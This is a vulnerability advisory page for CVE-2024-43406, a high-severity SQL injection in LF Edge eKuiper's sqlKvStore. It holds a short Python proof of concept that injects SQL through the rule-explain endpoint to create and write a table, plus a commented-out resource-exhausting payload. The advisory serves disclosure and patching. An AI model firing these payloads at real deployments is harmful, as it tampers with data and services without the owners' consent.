logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2024-43406 ekuiper

Package

Manager: pip
Name: ekuiper
Vulnerable Version: >=0 <1.14.2

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.0061 pctl0.6882

Details

LF Edge eKuiper has a SQL Injection in sqlKvStore ### Summary A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. ### Details I will use explainRuleHandler ("/rules/{name}/explain") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc. The SQL injection can happen in the code: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93 The code to accept user input is: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277 The rule id in the above code can be used to exploit SQL query. Note that the delete function is also vulnerable: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141 ### PoC ``` import requests from urllib.parse import quote # SELECT val FROM 'xxx' WHERE key='%s'; payload = f"""'; ATTACH DATABASE 'test93' AS test93; CREATE TABLE test93.pwn (dataz text); INSERT INTO test93.pwn (dataz) VALUES ("sql injection");--""" #payload = "deadbeef'; SELECT 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000))));--" url = f"http://127.0.0.1:9081/rules/{quote(payload,safe='')}/explain" # explainRuleHandler res = requests.get(url) print(res.content) ``` The screenshot shows the malicious SQL query to insert a value: ![image](https://github.com/user-attachments/assets/baf035cc-a561-4909-8d1f-e455e75375cb) The screenshot shows the breakpoint of executing the query: ![image](https://github.com/user-attachments/assets/b9c29945-a0cc-4271-bdc8-c1bddfda5b6f) ### Impact SQL Injection vulnerability The reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.

Metadata

Created: 2024-08-20T20:04:31Z
Modified: 2024-08-27T14:27:18Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/08/GHSA-r5ph-4jxm-6j9p/GHSA-r5ph-4jxm-6j9p.json
CWE IDs: ["CWE-89"]
Alternative ID: GHSA-r5ph-4jxm-6j9p
Finding: F297
Auto approve: 1